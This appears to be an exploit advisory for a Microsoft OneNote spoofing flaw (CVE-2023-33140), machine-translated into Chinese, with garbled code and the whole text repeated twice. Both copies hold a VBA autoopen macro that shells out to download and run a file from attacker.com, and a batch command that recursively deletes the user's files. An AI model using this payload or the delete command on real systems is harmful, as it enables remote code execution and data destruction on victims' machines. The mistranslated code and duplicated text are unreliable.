## title: Microsoft OneNote(版本2305 Build 16.0.16501.20074)64位- 欺骗
##作者: nu11secur1ty
## date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-note-taking-app
##参考: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-vormented
## Description:
Microsoft OneNote很容易受到欺骗攻击。恶意
用户可以欺骗受害者点击一个非常恶意制作的
URL或下载其他一些恶意文件并执行它。当这个
发生游戏将结束,受害者的计算机将会
妥协。
利用漏洞需要用户打开特殊
具有Microsoft OneNote的受影响版本的制作文件,然后
单击一个专门制作的URL,以遭到攻击者的损害。
状态:高脆弱性
[+] exploit:
``VBS
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
https://attacker.com/kurec.badass kurec.badass。\ kurec.badass',
vbnormalfocus)
结束子
````````
[+]内部探索
````````
@echo离开
DEL /S /Q C:%Homepath%\重要\*
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve-mitre/tree/tree/main/main/2023/cve-2023-33140)
##证明和Exploit:
[HREF](https://ww.nu11secur1ty.com/2023/06/cve-2023-33140.html)
##时间花费:
01:15:00
- -
##作者: nu11secur1ty
## date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-note-taking-app
##参考: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-vormented
## Description:
Microsoft OneNote很容易受到欺骗攻击。恶意
用户可以欺骗受害者点击一个非常恶意制作的
URL或下载其他一些恶意文件并执行它。当这个
发生游戏将结束,受害者的计算机将会
妥协。
利用漏洞需要用户打开特殊
具有Microsoft OneNote的受影响版本的制作文件,然后
单击一个专门制作的URL,以遭到攻击者的损害。
状态:高脆弱性
[+] exploit:
``VBS
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
https://attacker.com/kurec.badass kurec.badass。\ kurec.badass',
vbnormalfocus)
结束子
````````
[+]内部探索
````````
@echo离开
DEL /S /Q C:%Homepath%\重要\*
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve-mitre/tree/tree/main/main/2023/cve-2023-33140)
##证明和Exploit:
[HREF](https://ww.nu11secur1ty.com/2023/06/cve-2023-33140.html)
##时间花费:
01:15:00
- -